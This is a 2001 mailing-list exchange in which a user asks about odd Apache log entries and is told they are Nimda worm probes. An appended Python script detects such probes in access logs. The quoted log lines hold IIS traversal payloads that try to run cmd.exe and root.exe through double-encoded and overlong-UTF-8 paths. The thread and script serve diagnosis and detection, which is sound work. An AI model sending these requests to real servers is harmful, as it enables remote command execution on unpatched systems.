tomcat-users mailing list archives

From Paul Foxton <p...@network-sol.com>
Subject RE: Apache access.log - (whats going on)
Date Wed, 10 Oct 2001 09:59:02 GMT
That's the Nimda worm looking for IIS vulnerabilities.

> -----Original Message-----
> From: Lars Nielsen Lind [mailto:moonie@worldonline.dk]
> Sent: 10 October 2001 07:20
> To: tomcat-user@jakarta.apache.org
> Subject: Apache access.log - (whats going on)
> 
> 
> Hi.
> 
> I have read my access.log (Apache) and found several IPs as 
> shown below. What's going on?
> 
> /Lars Nielsen Lind
>  
> 62.79.14.52 - - [10/Oct/2001:07:44:50 +0200] "GET 
> /scripts/root.exe?/c+dir HTTP/1.0" 404 287 "-" "-"
> 
> 62.79.14.52 - - [10/Oct/2001:07:44:50 +0200] "GET 
> /MSADC/root.exe?/c+dir HTTP/1.0" 404 285 "-" "-"
> 
> 62.79.14.52 - - [10/Oct/2001:07:44:50 +0200] "GET 
> /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295 "-" "-"
> 
> 62.79.14.52 - - [10/Oct/2001:07:44:50 +0200] "GET 
> /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295 "-" "-"
> 
> 62.79.14.52 - - [10/Oct/2001:07:44:51 +0200] "GET 
> /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 
> 404 309 "-" "-"
> 
> 62.79.14.52 - - [10/Oct/2001:07:44:51 +0200] "GET 
> /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe
> ?/c+dir HTTP/1.0" 404 326 "-" "-"
> 
> 62.79.14.52 - - [10/Oct/2001:07:44:51 +0200] "GET 
> /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe
> ?/c+dir HTTP/1.0" 404 326 "-" "-"
> 
> 62.79.14.52 - - [10/Oct/2001:07:44:51 +0200] "GET 
> /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1
> %1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 342 "-" "-"
> 
> 62.79.14.52 - - [10/Oct/2001:07:44:51 +0200] "GET 
> /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 
> 404 308 "-" "-"
> 
> 62.79.14.52 - - [10/Oct/2001:07:44:51 +0200] "GET 
> /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 
> 404 308 "-" "-"
> 
> 62.79.14.52 - - [10/Oct/2001:07:44:51 +0200] "GET 
> /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 
> 404 308 "-" "-"
> 
> 62.79.14.52 - - [10/Oct/2001:07:44:51 +0200] "GET 
> /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 
> 404 308 "-" "-"
> 
> 62.79.14.52 - - [10/Oct/2001:07:44:52 +0200] "GET 
> /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 
> 400 292 "-" "-"
> 
> 62.79.14.52 - - [10/Oct/2001:07:44:52 +0200] "GET 
> /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 
> 400 292 "-" "-"
> 
> 62.79.14.52 - - [10/Oct/2001:07:44:52 +0200] "GET 
> /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir 
> HTTP/1.0" 404 309 "-" "-"
> 
> 62.79.14.52 - - [10/Oct/2001:07:44:52 +0200] "GET 
> /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 
> 404 309 "-" "-"
> 
> 
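
As an added example (not part of either message in this thread), here is one way to flag this kind of probe in an Apache access log: decode each request path exactly once, then look for the three features visible in the entries above. The function names `classify` and `scan` are hypothetical; the first four sample lines are re-joined from the wrapped log in the quoted message and the last is constructed.

```python
import re
from urllib.parse import unquote_to_bytes

# Apache common/combined log: client, timestamp, request line, status.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')
PCT_RE = re.compile(rb'%[0-9a-fA-F]{2}')

def classify(path):
    """Return the reasons a request path looks like an IIS traversal probe."""
    reasons = set()
    once = unquote_to_bytes(path.split('?', 1)[0])  # decode exactly once
    if re.search(rb'/(cmd|root)\.exe$', once.lower()):
        reasons.add('shell-binary')
    if PCT_RE.search(once):  # still a %xx escape after one decode
        reasons.add('double-encoding')
    # 0xC0/0xC1 are never valid UTF-8 lead bytes (overlong forms of ASCII);
    # URLs encoded as Latin-1 can contain them, so treat this as a hint.
    if b'\xc0' in once or b'\xc1' in once:
        reasons.add('overlong-utf8')
    return reasons

def scan(lines):
    """Map client IP -> [(path, status, reasons)] for suspicious requests."""
    hits = {}
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not an access-log entry
        ip, _ts, _method, path, status = m.groups()
        reasons = classify(path)
        if reasons:
            hits.setdefault(ip, []).append((path, int(status), sorted(reasons)))
    return hits

# Entries 1-4 are re-joined from the mail-wrapped log in the quoted message;
# the last entry is a constructed benign request.
SAMPLE = [
    '62.79.14.52 - - [10/Oct/2001:07:44:50 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 287 "-" "-"',
    '62.79.14.52 - - [10/Oct/2001:07:44:51 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309 "-" "-"',
    '62.79.14.52 - - [10/Oct/2001:07:44:51 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 "-" "-"',
    '62.79.14.52 - - [10/Oct/2001:07:44:52 +0200] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 292 "-" "-"',
    '192.0.2.10 - - [10/Oct/2001:07:45:10 +0200] "GET /index.html HTTP/1.0" 200 1043 "-" "-"',
]

if __name__ == '__main__':
    for ip, rows in scan(SAMPLE).items():
        for path, status, reasons in rows:
            print(ip, status, ','.join(reasons), path)
```

The status column is worth keeping in the output: every flagged entry in the log above ended in 404 or 400, meaning none of the requested paths resolved on this server.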
